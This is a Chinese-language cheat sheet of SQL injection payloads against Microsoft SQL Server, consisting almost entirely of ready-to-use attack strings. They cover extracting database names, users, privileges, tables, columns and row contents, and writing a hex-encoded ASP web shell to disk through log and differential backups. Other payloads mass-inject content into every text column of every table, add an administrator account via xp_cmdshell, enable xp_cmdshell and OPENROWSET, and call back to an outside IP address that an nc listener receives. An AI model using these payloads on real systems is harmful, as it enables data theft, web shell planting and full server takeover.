mssql注入和mysql注入_MSSQL注入代码

■获取数据库名

and db_name()=0

and db_name(0)=0

and db_name(__i__)=0

and quotename(db_name(__i__))=0

■获取用户名

and user=0

■获取版本信息

and @@version=0

■获取服务器名

and @@servername=0

■获取服务名

and @@servicename=0

■获取系统用户名

and system_user=0

■一次性获取所有基本信息

AnD

(dB_NaMe(0)+cHaR(124)+uSeR+cHaR(124)+@@vErSiOn+cHaR(124)+@@sErVeRnAmE+cHaR(124)+@@sErViCeNaMe+cHaR(124)+sYsTeM_UsEr)=0

■一次性探测权限

AnD

(cAsT(iS_srvrOlEmEmBeR(0x730079007300610064006d0069006e00)aS

vArChAr)+cHaR(94)+cAsT(iS_srvrOlEmEmBeR(0x64006200630072006500610074006f007200)aS

vArChAr)+cHaR(94)+cAsT(iS_srvrOlEmEmBeR(0x620075006c006b00610064006d0069006e00)aS

vArChAr)+cHaR(94)+cAsT(iS_srvrOlEmEmBeR(0x6400690073006b00610064006d0069006e00)aS

vArChAr)+cHaR(94)+cAsT(iS_srvrOlEmEmBeR(0x730065007200760065007200610064006d0069006e00)aS

vArChAr)+cHaR(94)+cAsT(iS_mEmBeR (0x7000750062006c0069006300) aS

vArChAr)+cHaR(94)+cAsT(iS_mEmBeR

(0x640062005f006f0077006e0065007200) aS

vArChAr)+cHaR(94)+cAsT(iS_mEmBeR

(0x640062005f006200610063006b00750070006f00700065007200610074006f007200)

aS vArChAr)+cHaR(94)+cAsT(iS_mEmBeR

(0x640062005f006400610074006100770072006900740065007200) aS

vArChAr))=0

■获取数据库的数目

AnD (sElEcT cAsT(cOuNt(1) aS

nvArChAr(100))+cHaR(9) FrOm mAsTeR..sYsDaTaBaSeS)=0

■获取数据库文件名

and (select top 1 filename from (select top

__i__ filename from master..sysdatabases order by filename) t order

by filename desc)=0

■同时获取数据库名和数据库文件名

AnD (sElEcT ToP 1 rtrim(iSnUlL(cAsT(nAmE aS

nvArChAr(4000)),cHaR(32)))+cHaR(9)+rtrim(iSnUlL(cAsT(filenAmE aS

nvArChAr(4000)),cHaR(32)))+cHaR(9) FrOm (sElEcT ToP __i__

nAmE,filenAmE FrOm mAsTeR..sYsDaTaBaSeS oRdEr bY nAmE) t oRdEr bY

nAmE dEsC)=0

■获取数据库的表的数目

and (select cast(count(1) as

varchar)+char(9) from

..sysobjects where

xtype=0x75)=0

■获取数据库的表

and (select top 1 name from (select top

__i__ name from ..sysobjects

where xtype=0X75 order by name) t order by name desc)=0

and (select top 1 quotename(name) from

.dbo.sysobjects where

xtype=char(85) AND name not in (select top __i__ name from

.dbo.sysobjects where

xtype=char(85)))=0

■获取表的字段的数目

and (select cast(count(1) as

varchar)+char(9) from

..syscolumns where

id=object_id(''))=0

■获取数据库表的字段

and (select top 1 name from (select top

__i__ name,id from ..syscolumns

where id=object_id('') order by

name) t order by name desc)=0

and (select

col_name(object_id(''),__i__))=0

■获取满足条件的表的记录数

AnD (sElEcT cAsT(cOuNt(1) aS

nvArChAr(100))+cHaR(9) FrOm

..)=0

■获取数据库的内容

AnD (sElEcT ToP 1

rtrim(iSnUlL(cAsT( aS

nvArChAr(4000)),cHaR(32)))+cHaR(9)+rtrim(iSnUlL(cAsT(

aS

nvArChAr(4000)),cHaR(32)))+cHaR(9)+rtrim(iSnUlL(cAsT(

aS nvArChAr(4000)),cHaR(32)))+cHaR(9) FrOm (sElEcT ToP __i__

,,

FrOm

..

oRdEr bY ) t oRdEr bY

dEsC)=0

■基于日志差异备份

--1. 进行初始备份

; Alter Database TestDB Set Recovery Full Drop Table ttt

Create Table ttt (a image) Backup Log TestDB to disk =

'' With

Init--

--2. 插入数据

;Insert Into ttt

Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--

--3. 备份并获得文件,删除临时表

;Backup Log To Disk =

'';Drop

Table ttt Alter Database TestDB Set Recovery SIMPLE--

■基于数据库差异备份

1. 进行差异备份准备工作

;Declare @a Sysname;Set @a=db_name();Declare @file

VarChar(400);Set

@file=;Drop

Table ttt Create Table ttt(c Image) Backup Database @a To

Disk=@file--

2. 将数据写入到数据库

;Insert Into ttt

Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--

3. 备份数据库并作最后的清理工作

;Declare @b SysName;Set @b=db_name();Declare @file1

VarChar(400);Set

@file1=;Backup

Database @b To Disk=@file1 With Differential,Format;Drop Table

ttt;--

■数据库插马(插指定数据库的指定表的满足条件的记录)

;update

..

set

=+''

where --

■数据库批量插马(插所有可插入的字段和记录,危险!!请谨慎操作!!)

;dEcLaRe @t vArChAr(255),@c vArChAr(255) dEcLaRe tAbLe_cursoR

cUrSoR FoR sElEcT a.nAmE,b.nAmE FrOm sYsObJeCtS a,sYsCoLuMnS b

wHeRe a.iD=b.iD AnD a.xTyPe='u' AnD (b.xTyPe=99 oR b.xTyPe=35 oR

b.xTyPe=231 oR b.xTyPe=167) oPeN tAbLe_cursoR fEtCh next FrOm

tAbLe_cursoR iNtO @t,@c while(@@fEtCh_status=0) bEgIn exec('UpDaTe

['+@t+'] sEt

['+@c+']=rtrim(convert(varchar,['+@c+']))+cAsT(

aS vArChAr(200))') fEtCh

next FrOm tAbLe_cursoR iNtO @t,@c eNd cLoSe tAbLe_cursoR dEAlLoCaTe

tAbLe_cursoR;--

;DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor

CURSOR FOR SELECT a.name,b.name FROM sysobjects a,s yscolumns b

WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR

b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM

Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE

['+@T+'] SET

['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''''')

FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor

DEALLOCATE Table_Cursor--

■执行命令行(无结果返回)

;exec master..xp_cmdshell 'net user name password /add

& net localgroup administrators name /add'--

■恢复存储过程 xp_cmdshell

;Exec Master..sp_dropextendedproc

0x780070005F0063006D0064007300680065006C006C00;Exec

Master..sp_addextendedproc

0x780070005F0063006D0064007300680065006C006C00,0x78706C6F6737302E646C6C--

■SQLServer 2005 开启和关闭 xp_cmdshell

;EXEC master..sp_configure 'show advanced

options',1;RECONFIGURE;EXEC master..sp_configure

'xp_cmdshell',1;RECONFIGURE;

关闭 xp_cmdshell

;EXEC master..sp_configure 'show advanced

options',1;RECONFIGURE;EXEC master..sp_configure

'xp_cmdshell',0;RECONFIGURE;

■SQLServer 2005 开启和关闭 OpenDataSource/OpenRowSet

开启:

;EXEC master..sp_configure 'show advanced

options',1;RECONFIGURE;EXEC master..sp_configure 'Ad Hoc

Distributed Queries',1;RECONFIGURE;

关闭:

;EXEC master..sp_configure 'show advanced

options',1;RECONFIGURE;EXEC master..sp_configure 'Ad Hoc

Distributed Queries',0;RECONFIGURE;

■SQLServer 2005 日志差异备份

alter database [testdb] set recovery full

declare @d nvarchar(4000) set @d=0x640062006200610063006B00

backup database __dbname__ to disk=@d with init--

drop table [itpro]--

create table [itpro]([a] image)--

declare @d nvarchar(4000) set @d=0x640062006200610063006B00

backup log __dbname__ to disk=@d with init--

insert into [itpro]([a]) values(__varchar(木马内容))--

declare @d nvarchar(4000) set @d=__nvarchar(文件名) backup log

__dbname__ to disk=@d with init--

drop table [itpro] declare @d nvarchar(4000) set

@d=0x640062006200610063006B00 backup log __dbname__ to disk=@d with

init--

■查看数据库服务器IP

NC监听80端口:nc -vvlp 80

(反连看IP,自己机器并不一定要有装MSSQL的),在注射点上注射如下语句:

;insert into

OPENROWSET('SQLOLEDB','uid=sa;pwd=netpatch;Network=DBMSSOCN;Address=58.53.58.32,80;',

'select * from dest_table') select * from src_table;--

因为我们只要看IP,所以其他的参数就无所谓了。而端口设置成80,是为了预防一些机器只让访问外部80。
